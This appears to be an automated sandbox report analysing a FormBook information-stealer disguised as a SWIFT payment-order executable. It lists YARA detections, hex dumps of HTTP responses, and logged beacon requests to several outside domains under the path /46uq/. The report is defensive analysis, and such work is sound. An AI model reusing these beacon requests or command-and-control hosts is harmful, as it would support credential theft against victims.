61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:31:56 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://help.gandi.net/en
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://news.gandi.net/en
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://shop.gandi.net/en
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://shop.gandi.net/en/domain/suggest?search=elderlycareacademy.com&amp;source=parking
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://shop.gandi.net/en/domain/transfer
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=elderlycareacademy.com
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://www.gandi.net/en
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://www.gandi.net/en/cloud
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://www.gandi.net/en/security
          Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpString found in binary or memory: https://www.gandi.net/en/simple-hosting
          Source: unknownDNS traffic detected: queries for: www.innovativepropsolutions.com
          Source: global trafficHTTP traffic detected: GET /46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 HTTP/1.1Host: www.wamhsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB HTTP/1.1Host: www.pyjama-france.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 HTTP/1.1Host: www.hpsaddlerock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y HTTP/1.1Host: www.aarondecker.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_00FD8250
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_00FDD2F8
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_052A5AA0
